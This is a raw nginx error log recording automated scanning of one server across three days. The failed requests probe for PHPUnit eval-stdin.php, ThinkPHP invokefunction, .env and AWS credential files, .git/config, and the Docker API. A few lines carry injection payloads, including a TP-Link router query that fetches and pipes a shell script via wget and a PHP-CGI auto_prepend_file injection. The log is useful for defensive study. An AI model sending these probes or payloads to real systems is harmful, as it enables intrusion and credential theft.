2026/02/15 22:26:37 [error] 843#843: *26985 open() "/var/www/html/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 160.187.165.218, server: localhost-nginx-proxy-manager, request: "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 22:26:37 [error] 843#843: *26985 open() "/var/www/html/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 160.187.165.218, server: localhost-nginx-proxy-manager, request: "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 22:26:37 [error] 843#843: *26985 open() "/var/www/html/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 160.187.165.218, server: localhost-nginx-proxy-manager, request: "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 22:26:37 [error] 843#843: *26985 open() "/var/www/html/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 160.187.165.218, server: localhost-nginx-proxy-manager, request: "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 22:26:38 [error] 843#843: *26985 open() "/var/www/html/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 160.187.165.218, server: localhost-nginx-proxy-manager, request: "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 22:26:38 [error] 843#843: *26985 open() "/var/www/html/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 160.187.165.218, server: localhost-nginx-proxy-manager, request: "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 22:26:38 [error] 843#843: *26985 open() "/var/www/html/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 160.187.165.218, server: localhost-nginx-proxy-manager, request: "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 22:26:38 [error] 843#843: *26985 open() "/var/www/html/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 160.187.165.218, server: localhost-nginx-proxy-manager, request: "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 22:26:38 [error] 843#843: *26985 open() "/var/www/html/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 160.187.165.218, server: localhost-nginx-proxy-manager, request: "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 22:26:39 [error] 843#843: *26985 open() "/var/www/html/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 160.187.165.218, server: localhost-nginx-proxy-manager, request: "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 22:26:39 [error] 843#843: *26985 open() "/var/www/html/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 160.187.165.218, server: localhost-nginx-proxy-manager, request: "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 22:26:39 [error] 843#843: *26985 open() "/var/www/html/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 160.187.165.218, server: localhost-nginx-proxy-manager, request: "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 22:26:39 [error] 843#843: *26985 open() "/var/www/html/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 160.187.165.218, server: localhost-nginx-proxy-manager, request: "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 22:26:40 [error] 843#843: *26985 open() "/var/www/html/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 160.187.165.218, server: localhost-nginx-proxy-manager, request: "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 22:26:40 [error] 843#843: *26985 open() "/var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 160.187.165.218, server: localhost-nginx-proxy-manager, request: "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 22:26:40 [error] 843#843: *26985 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 160.187.165.218, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 22:26:40 [error] 843#843: *26985 open() "/var/www/html/public/index.php" failed (2: No such file or directory), client: 160.187.165.218, server: localhost-nginx-proxy-manager, request: "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 22:26:41 [error] 843#843: *26985 open() "/var/www/html/containers/json" failed (2: No such file or directory), client: 160.187.165.218, server: localhost-nginx-proxy-manager, request: "GET /containers/json HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 23:09:14 [error] 843#843: *27051 open() "/var/www/html/.env" failed (2: No such file or directory), client: 34.158.168.101, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "222.117.41.51:80"
2026/02/16 01:36:21 [error] 855#855: *28921 open() "/var/www/html/.well-known/security.txt" failed (2: No such file or directory), client: 206.168.34.57, server: localhost-nginx-proxy-manager, request: "GET /.well-known/security.txt HTTP/1.1", host: "222.117.41.51"
2026/02/16 03:00:30 [error] 854#854: *30562 open() "/var/www/html/robots.txt" failed (2: No such file or directory), client: 115.231.78.11, server: localhost-nginx-proxy-manager, request: "GET /robots.txt HTTP/1.1", host: "222.117.41.51:80"
2026/02/16 04:31:24 [error] 854#854: *32280 open() "/var/www/html/.well-known/security.txt" failed (2: No such file or directory), client: 206.168.34.63, server: localhost-nginx-proxy-manager, request: "GET /.well-known/security.txt HTTP/1.1", host: "222.117.41.51"
2026/02/16 04:31:58 [error] 854#854: *32281 open() "/var/www/html/boaform/admin/formLogin" failed (2: No such file or directory), client: 105.155.199.178, server: localhost-nginx-proxy-manager, request: "GET /boaform/admin/formLogin?username=user&psd=user HTTP/1.0"
2026/02/16 04:43:58 [error] 855#855: *32326 open() "/var/www/html/developmentserver/metadatauploader" failed (2: No such file or directory), client: 135.237.126.148, server: localhost-nginx-proxy-manager, request: "GET /developmentserver/metadatauploader HTTP/1.1", host: "222.117.41.51"
2026/02/16 06:31:39 [error] 867#867: *32580 "/var/www/html/webui/index.html" is not found (2: No such file or directory), client: 64.62.156.122, server: localhost-nginx-proxy-manager, request: "GET /webui/ HTTP/1.1", host: "222.117.41.51"
2026/02/16 06:33:47 [error] 866#866: *34070 "/var/www/html/geoserver/web/index.html" is not found (2: No such file or directory), client: 64.62.156.122, server: localhost-nginx-proxy-manager, request: "GET /geoserver/web/ HTTP/1.1", host: "222.117.41.51"
2026/02/16 07:36:29 [error] 866#866: *34156 open() "/var/www/html/.env" failed (2: No such file or directory), client: 45.135.193.11, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "222.117.41.51:80"
2026/02/16 07:36:29 [error] 866#866: *34156 open() "/var/www/html/.env.local" failed (2: No such file or directory), client: 45.135.193.11, server: localhost-nginx-proxy-manager, request: "GET /.env.local HTTP/1.1", host: "222.117.41.51:80"
2026/02/16 07:36:29 [error] 866#866: *34156 open() "/var/www/html/.env.staging" failed (2: No such file or directory), client: 45.135.193.11, server: localhost-nginx-proxy-manager, request: "GET /.env.staging HTTP/1.1", host: "222.117.41.51:80"
2026/02/16 07:36:30 [error] 866#866: *34156 open() "/var/www/html/.env.production" failed (2: No such file or directory), client: 45.135.193.11, server: localhost-nginx-proxy-manager, request: "GET /.env.production HTTP/1.1", host: "222.117.41.51:80"
2026/02/16 07:36:30 [error] 866#866: *34156 open() "/var/www/html/.env.development" failed (2: No such file or directory), client: 45.135.193.11, server: localhost-nginx-proxy-manager, request: "GET /.env.development HTTP/1.1", host: "222.117.41.51:80"
2026/02/16 07:36:30 [error] 866#866: *34156 open() "/var/www/html/.aws/credentials" failed (2: No such file or directory), client: 45.135.193.11, server: localhost-nginx-proxy-manager, request: "GET /.aws/credentials HTTP/1.1", host: "222.117.41.51:80"
2026/02/16 07:36:31 [error] 866#866: *34156 open() "/var/www/html/app/.env" failed (2: No such file or directory), client: 45.135.193.11, server: localhost-nginx-proxy-manager, request: "GET /app/.env HTTP/1.1", host: "222.117.41.51:80"
2026/02/16 07:36:31 [error] 866#866: *34156 open() "/var/www/html/config.json" failed (2: No such file or directory), client: 45.135.193.11, server: localhost-nginx-proxy-manager, request: "GET /config.json HTTP/1.1", host: "222.117.41.51:80"
2026/02/16 08:34:25 [error] 860#860: *34200 "/var/www/html/HNAP1/index.html" is not found (2: No such file or directory), client: 182.121.171.223, server: localhost-nginx-proxy-manager, request: "POST /HNAP1/ HTTP/1.0", host: "222.117.41.51:80"
2026/02/16 09:52:08 [error] 862#862: *34322 open() "/var/www/html/druid/index.html" failed (2: No such file or directory), client: 20.65.195.53, server: localhost-nginx-proxy-manager, request: "GET /druid/index.html HTTP/1.1", host: "222.117.41.51"
2026/02/16 11:43:31 [error] 862#862: *35923 open() "/var/www/html/.env" failed (2: No such file or directory), client: 34.158.168.101, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "222.117.41.51:80"
2026/02/16 12:02:39 [error] 874#874: *35956 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 104.192.2.62, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "222.117.41.51"
2026/02/16 13:42:13 [error] 878#878: *37548 open() "/var/www/html/robots.txt" failed (2: No such file or directory), client: 152.32.250.21, server: localhost-nginx-proxy-manager, request: "GET /robots.txt HTTP/1.1", host: "222.117.41.51"
2026/02/16 13:42:13 [error] 878#878: *37549 open() "/var/www/html/sitemap.xml" failed (2: No such file or directory), client: 152.32.250.21, server: localhost-nginx-proxy-manager, request: "GET /sitemap.xml HTTP/1.1", host: "222.117.41.51"
2026/02/16 13:42:13 [error] 878#878: *37550 open() "/var/www/html/config.json" failed (2: No such file or directory), client: 152.32.250.21, server: localhost-nginx-proxy-manager, request: "GET /config.json HTTP/1.1", host: "222.117.41.51"
2026/02/16 15:54:02 [error] 874#874: *39230 open() "/var/www/html/portal/redlion" failed (2: No such file or directory), client: 40.74.212.73, server: localhost-nginx-proxy-manager, request: "GET /portal/redlion HTTP/1.1", host: "222.117.41.51"
2026/02/16 17:45:22 [error] 872#872: *39262 open() "/var/www/html/.env" failed (2: No such file or directory), client: 34.158.168.101, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "222.117.41.51:80"
2026/02/16 17:52:32 [error] 872#872: *39271 open() "/var/www/html/.env" failed (2: No such file or directory), client: 34.158.168.101, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "222.117.41.51:80"
2026/02/16 18:22:45 [error] 887#887: *39281 open() "/var/www/html/dispatch.asp" failed (2: No such file or directory), client: 195.3.221.86, server: localhost-nginx-proxy-manager, request: "GET /dispatch.asp HTTP/1.1", host: "222.117.41.51:80"
2026/02/16 20:02:18 [error] 882#882: *39430 open() "/var/www/html/manager/text/list" failed (2: No such file or directory), client: 20.169.105.85, server: localhost-nginx-proxy-manager, request: "GET /manager/text/list HTTP/1.1", host: "222.117.41.51"
2026/02/16 20:07:05 [error] 882#882: *39435 open() "/var/www/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 221.159.119.6, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//0.0.0.0/router.tplink.sh%20-O-%7Csh) HTTP/1.1", host: "222.117.41.51:80"
2026/02/16 20:07:05 [error] 882#882: *39436 open() "/var/www/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 221.159.119.6, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//0.0.0.0/router.tplink.sh%20-O-%7Csh) HTTP/1.1", host: "222.117.41.51:80"
2026/02/16 20:34:09 [error] 882#882: *39532 open() "/var/www/html/.env" failed (2: No such file or directory), client: 34.158.168.101, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "222.117.41.51:80"
2026/02/16 20:40:18 [error] 882#882: *39551 open() "/var/www/html/.env" failed (2: No such file or directory), client: 34.158.168.101, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "222.117.41.51:80"
2026/02/16 20:42:10 [error] 882#882: *39569 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 195.178.110.162, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "222.117.41.51"
2026/02/16 22:31:29 [error] 886#886: *39792 open() "/var/www/html/admin/config.php" failed (2: No such file or directory), client: 102.22.20.125, server: localhost-nginx-proxy-manager, request: "GET /admin/config.php HTTP/1.0", host: "222.117.41.51"
2026/02/16 23:58:43 [error] 895#895: *39989 open() "/var/www/html/.env" failed (2: No such file or directory), client: 45.135.193.11, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "222.117.41.51:80"
2026/02/16 23:58:43 [error] 895#895: *39989 open() "/var/www/html/.env.local" failed (2: No such file or directory), client: 45.135.193.11, server: localhost-nginx-proxy-manager, request: "GET /.env.local HTTP/1.1", host: "222.117.41.51:80"
2026/02/16 23:58:44 [error] 895#895: *39989 open() "/var/www/html/.env.staging" failed (2: No such file or directory), client: 45.135.193.11, server: localhost-nginx-proxy-manager, request: "GET /.env.staging HTTP/1.1", host: "222.117.41.51:80"
2026/02/16 23:58:45 [error] 895#895: *39989 open() "/var/www/html/.env.production" failed (2: No such file or directory), client: 45.135.193.11, server: localhost-nginx-proxy-manager, request: "GET /.env.production HTTP/1.1", host: "222.117.41.51:80"
2026/02/16 23:58:46 [error] 895#895: *39989 open() "/var/www/html/.env.development" failed (2: No such file or directory), client: 45.135.193.11, server: localhost-nginx-proxy-manager, request: "GET /.env.development HTTP/1.1", host: "222.117.41.51:80"
2026/02/16 23:58:46 [error] 895#895: *39989 open() "/var/www/html/.aws/credentials" failed (2: No such file or directory), client: 45.135.193.11, server: localhost-nginx-proxy-manager, request: "GET /.aws/credentials HTTP/1.1", host: "222.117.41.51:80"
2026/02/16 23:58:47 [error] 895#895: *39989 open() "/var/www/html/app/.env" failed (2: No such file or directory), client: 45.135.193.11, server: localhost-nginx-proxy-manager, request: "GET /app/.env HTTP/1.1", host: "222.117.41.51:80"
2026/02/16 23:58:47 [error] 895#895: *39989 open() "/var/www/html/config.json" failed (2: No such file or directory), client: 45.135.193.11, server: localhost-nginx-proxy-manager, request: "GET /config.json HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 00:37:54 [error] 901#901: *40043 open() "/var/www/html/hudson" failed (2: No such file or directory), client: 20.163.14.222, server: localhost-nginx-proxy-manager, request: "GET /hudson HTTP/1.1", host: "222.117.41.51"
2026/02/17 00:43:58 [error] 902#902: *40045 open() "/var/www/html/developmentserver/metadatauploader" failed (2: No such file or directory), client: 20.80.88.32, server: localhost-nginx-proxy-manager, request: "GET /developmentserver/metadatauploader HTTP/1.1", host: "222.117.41.51"
2026/02/17 02:27:54 [error] 898#898: *40379 open() "/var/www/html/.env" failed (2: No such file or directory), client: 34.158.168.101, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 03:40:10 [error] 896#896: *40750 open() "/var/www/html/.env" failed (2: No such file or directory), client: 34.158.168.101, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 03:40:50 [error] 899#899: *40765 open() "/var/www/html/WuEL" failed (2: No such file or directory), client: 195.170.172.128, server: localhost-nginx-proxy-manager, request: "GET /WuEL HTTP/1.1", host: "222.117.41.51"
2026/02/17 03:40:51 [error] 899#899: *40767 open() "/var/www/html/a" failed (2: No such file or directory), client: 195.170.172.128, server: localhost-nginx-proxy-manager, request: "GET /a HTTP/1.1", host: "222.117.41.51"
2026/02/17 03:40:52 [error] 899#899: *40768 open() "/var/www/html/download/file.ext" failed (2: No such file or directory), client: 195.170.172.128, server: localhost-nginx-proxy-manager, request: "GET /download/file.ext HTTP/1.1", host: "222.117.41.51"
2026/02/17 03:40:53 [error] 899#899: *40769 open() "/var/www/html/SiteLoader" failed (2: No such file or directory), client: 195.170.172.128, server: localhost-nginx-proxy-manager, request: "GET /SiteLoader HTTP/1.1", host: "222.117.41.51"
2026/02/17 03:40:53 [error] 899#899: *40770 open() "/var/www/html/mPlayer" failed (2: No such file or directory), client: 195.170.172.128, server: localhost-nginx-proxy-manager, request: "GET /mPlayer HTTP/1.1", host: "222.117.41.51"
2026/02/17 04:53:47 [error] 899#899: *42443 open() "/var/www/html/login" failed (2: No such file or directory), client: 167.94.138.201, server: localhost-nginx-proxy-manager, request: "GET /login HTTP/1.1", host: "222.117.41.51"
2026/02/17 05:11:42 [error] 899#899: *42445 open() "/var/www/html/actuator/health" failed (2: No such file or directory), client: 20.65.193.129, server: localhost-nginx-proxy-manager, request: "GET /actuator/health HTTP/1.1", host: "222.117.41.51"
2026/02/17 06:37:50 [error] 912#912: *42487 "/var/www/html/webui/index.html" is not found (2: No such file or directory), client: 184.105.247.195, server: localhost-nginx-proxy-manager, request: "GET /webui/ HTTP/1.1", host: "222.117.41.51"
2026/02/17 06:40:28 [error] 912#912: *43975 "/var/www/html/geoserver/web/index.html" is not found (2: No such file or directory), client: 184.105.247.195, server: localhost-nginx-proxy-manager, request: "GET /geoserver/web/ HTTP/1.1", host: "222.117.41.51"
2026/02/17 06:54:12 [error] 912#912: *43981 open() "/var/www/html/boaform/admin/formLogin" failed (2: No such file or directory), client: 124.29.214.186, server: localhost-nginx-proxy-manager, request: "GET /boaform/admin/formLogin?username=user&psd=user HTTP/1.0"
2026/02/17 07:00:00 [error] 912#912: *43988 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 07:00:01 [error] 912#912: *43988 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 07:00:01 [error] 912#912: *43988 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 07:00:02 [error] 912#912: *43988 open() "/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 07:00:02 [error] 912#912: *43988 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 07:00:03 [error] 912#912: *43988 open() "/var/www/html/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 07:00:04 [error] 912#912: *43988 open() "/var/www/html/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 07:00:05 [error] 912#912: *43988 open() "/var/www/html/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 07:00:05 [error] 912#912: *43988 open() "/var/www/html/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 07:00:06 [error] 912#912: *43988 open() "/var/www/html/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 07:00:07 [error] 912#912: *43988 open() "/var/www/html/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 07:00:07 [error] 912#912: *43988 open() "/var/www/html/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 07:00:08 [error] 912#912: *43988 open() "/var/www/html/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 07:00:08 [error] 912#912: *43988 open() "/var/www/html/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 07:00:08 [error] 912#912: *43988 open() "/var/www/html/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 07:00:09 [error] 912#912: *43988 open() "/var/www/html/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 07:00:09 [error] 912#912: *43988 open() "/var/www/html/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 07:00:10 [error] 912#912: *43988 open() "/var/www/html/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 07:00:10 [error] 912#912: *43988 open() "/var/www/html/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 07:00:11 [error] 912#912: *43988 open() "/var/www/html/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 07:00:11 [error] 912#912: *43988 open() "/var/www/html/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 07:00:12 [error] 912#912: *43988 open() "/var/www/html/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 07:00:13 [error] 912#912: *43988 open() "/var/www/html/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 07:00:13 [error] 912#912: *43988 open() "/var/www/html/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 07:00:14 [error] 912#912: *43988 open() "/var/www/html/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 07:00:15 [error] 912#912: *43988 open() "/var/www/html/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 07:00:15 [error] 912#912: *43988 open() "/var/www/html/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 07:00:16 [error] 912#912: *43988 open() "/var/www/html/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 07:00:16 [error] 912#912: *43988 open() "/var/www/html/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 07:00:17 [error] 912#912: *43988 open() "/var/www/html/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 07:00:18 [error] 912#912: *43988 open() "/var/www/html/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 07:00:18 [error] 912#912: *43988 open() "/var/www/html/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 165.154.227.13, server: localhost-nginx-proxy-manager, request: "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
